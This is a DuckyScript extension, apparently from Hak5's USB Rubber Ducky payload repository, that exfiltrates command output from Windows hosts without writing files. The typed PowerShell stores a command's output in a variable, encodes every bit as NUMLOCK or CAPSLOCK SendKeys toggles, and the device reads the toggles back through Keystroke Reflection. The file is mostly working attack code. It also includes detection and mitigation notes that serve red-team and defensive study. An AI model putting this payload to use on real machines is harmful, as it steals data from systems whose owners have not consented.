GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL
EXTENSION WINDOWS_FILELESS_HID_EXFIL
    REM VERSION 1.0
    REM AUTHOR: 0i41E

    REM_BLOCK DOCUMENTATION
        Extension for Keystroke Reflection data exfiltration without putting files on disk.
        This extension is a proof of concept for USB HID-only data exfiltration and is based on Hak5's original method.

        TARGET:
            Windows hosts that support PowerShell and SendKeys

        USAGE:
            Type out your command or script with PowerShell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.
            It takes the command's/script's output and writes it into a variable, which then gets exfiltrated.

        Example Usage:
            GUI r
            DELAY 500
            STRINGLN powershell
            DELAY 1000
            STRING echo "This is my test"
            Windows_Fileless_HID_Exfil()

        HOW IT WORKS:
            The function appends a pipeline to the command that is already typed at the PowerShell prompt, so the
            command's output lands in a PowerShell variable instead of a file. Each character of that output is then
            expanded into eight SendKeys lock-key tokens (one per bit) plus a terminating SCROLLLOCK token, and the
            token string is replayed with SendKeys. The Ducky, in Keystroke Reflection mode, reads the resulting
            lock-key state changes back from the host and stores them as the exfiltrated data.

        DETECTION / MITIGATION NOTES:
            The PowerShell text typed by this function is visible to PowerShell script block logging (event 4104)
            when it is enabled; "Add-Type -A System.Windows.Forms" followed by a SendKeys call is a useful hunt pattern.
            On the host the transfer looks like a rapid burst of ALT+NUMLOCK / ALT+CAPSLOCK toggles ending in
            ALT+SCROLLLOCK, shortly after a new USB keyboard-class device was attached.
            Device-control policies for unknown USB HID devices, and PowerShell constrained language mode or
            application control (both restrict Add-Type), limit the typed stage and the SendKeys stage respectively.
    END_REM

    FUNCTION Windows_Fileless_HID_Exfil()
        REM Precondition: a PowerShell window is focused and a command has been typed but NOT executed;
        REM the first STRING below is appended to that pending line.
        DELAY 250
        REM Saving current Keyboard lock keys so NumLock/CapsLock/ScrollLock can be put back at the end
        SAVE_HOST_KEYBOARD_LOCK_STATE
        REM Enter Keystroke Reflection mode so the Ducky records the host's lock-key changes as data.
        REM NOTE(review): $_EXFIL_LEDS_ENABLED presumably controls LED feedback during exfil - confirm against the DuckyScript 3 reference.
        $_EXFIL_MODE_ENABLED = TRUE
        $_EXFIL_LEDS_ENABLED = TRUE
        DELAY 500
        REM Setting the output as variable: pipe the pending command's output through Out-String into $DD (in memory only)
        STRING |Out-String|Set-Variable -Name "DD";
        REM Converting output into Lock Key values: every character is tested MSB-first against 0x80..0x01;
        REM a set bit becomes the SendKeys token %{NUMLOCK}, a clear bit %{CAPSLOCK} (8 tokens per character,
        REM only the low 8 bits of each char are examined), and a trailing %{SCROLLLOCK} marks end of data.
        REM In SendKeys syntax the % prefix is the ALT modifier, so each token is sent as ALT+<lock key>.
        STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
        REM Exfiltrating via Keystroke Reflection: load System.Windows.Forms, replay the token string as keystrokes
        REM with SendWait (blocks until the host has processed them), then close the PowerShell session with exit.
        STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
        REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
        WAIT_FOR_SCROLL_CHANGE
        REM Green LED signals completion; then leave reflection mode and restore the host's original lock-key state
        LED_G
        $_EXFIL_MODE_ENABLED = FALSE
        RESTORE_HOST_KEYBOARD_LOCK_STATE
    END_FUNCTION
END_EXTENSION